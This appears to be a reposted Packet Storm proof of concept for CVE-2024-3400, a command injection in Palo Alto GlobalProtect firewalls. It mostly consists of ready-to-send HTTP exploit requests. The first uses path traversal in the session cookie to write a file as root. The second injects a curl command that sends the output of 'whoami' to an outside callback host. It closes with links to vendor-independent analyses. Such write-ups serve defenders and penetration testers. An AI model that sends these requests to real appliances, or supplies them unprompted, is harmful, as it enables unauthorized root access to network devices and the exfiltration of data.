Palo Alto OS Command Injection
2024-4-17 23:58:19 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

# CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

send this HTTP request:

```http

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)

you will create hellome1337.txt file on the server with root access

now if you try to access the files you should receive 403 insted of 404

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)

### Command Injection

```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

```

More Info :
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/


文章来源: https://packetstormsecurity.com/files/178099/paloalto-exec.txt
如有侵权请联系:admin#unsafe.sh